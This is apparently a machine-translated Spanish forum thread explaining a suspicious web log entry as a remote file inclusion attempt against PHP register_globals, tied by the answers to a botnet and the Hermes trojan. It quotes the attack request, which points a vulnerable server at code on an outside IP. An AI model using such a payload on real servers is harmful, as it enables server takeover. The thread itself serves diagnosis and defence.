Alguien en Hungría intentó algo extraño recientemente:
/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt?
Esta es la URL parcial de mi registro, que muestra la página a la que fueron. Dieron la URL de mi sitio como referente.
¿Qué haría este tipo de acceso a un servidor vulnerable?
Gracias por cualquier información.
Como @HendrikBrummermann ya se señaló en los comentarios, fue un intento de explotar register_globals en un servidor web habilitado para PHP.
El servidor que realizó la solicitud que terminó en los registros de su servidor web, por lo que resultó, era simplemente un servidor web infectado que se ejecuta en modo zombie, ejecutando un robot oculto que busca posibles vectores de ataque en servidores web confiados en todo Internet en su nombre de botnet más grande, controlada a través de un servidor de comando y control alojado en LeaseWeb BV, Países Bajos con IP de 87.255.51.229 que aloja cientos de dominios sospechosos . Según Spamhaus CBL , el servidor con una IP 94.199.51.7 ubicado en Budapest, Hungría se infectó con el troyano Hermes:
Hermes es un troyano bancario destinado a robar credenciales para Internet cuentas bancarias Se propaga a través de sitios web secuestrados (drive-by exploits) y archivos adjuntos de correo electrónico maliciosos.
He estado analizando un poco el comando y control de esta botnet, y está ejecutando un VNC Remote Desktop en el puerto 5900, lo que significa que también está controlado desde una ubicación remota que desconocemos. Pero eso está fuera del punto, ya que es bastante normal que esas redes criminales simplemente cambien a otra empresa de alojamiento, siempre y cuando la ley requiera que actúen en la red en la que se basan ahora. Como a las empresas de alojamiento no les gusta particularmente tomar medidas hasta que tengan absolutamente que hacerlo, esto podría no estar en la parte superior de su lista de tareas pendientes. Lo más probable es que la IP actual de la botnet se marque como una lista negra en demasiadas RBL para sentirse cómoda operando desde ( estado en vivo ), y mueva su comando y control a otra compañía de alojamiento.
En resumen, la línea sospechosa en los registros de su servidor web fue solo uno de los vectores de ataque que tales botnets buscarían, buscando formas de explotar los servidores web. Si la toma de control fue exitosa, la siguiente persona que abrió su página web habría sido redirigida al servidor zombie explotado en Budapest, Hungría, y la red de bots sabría que su servidor web era explotable al verificar la cadena de referencia. Sin embargo, su servidor web obviamente no era el fruto que esperaban explotar esto fácilmente, al menos no a través de este agujero de seguridad de PHP en particular. Botnet no se preocupa y ha pasado a escanear miles de hosts antes de que termine de leer mi última oración.
Solo otro día en la WWW. ;)
Según la URL, las cosas que está ejecutando el sitio PHP (variable _SERVER). El único efecto es que habrá definido _SERVER [DOCUMENT_ROOT] INSIDE _GET variable.
Array
(
[_GET] => Array
(
[_SERVER] => Array
(
[DOCUMENT_ROOT] => http://94.199.51.7/readme.txt?
)
)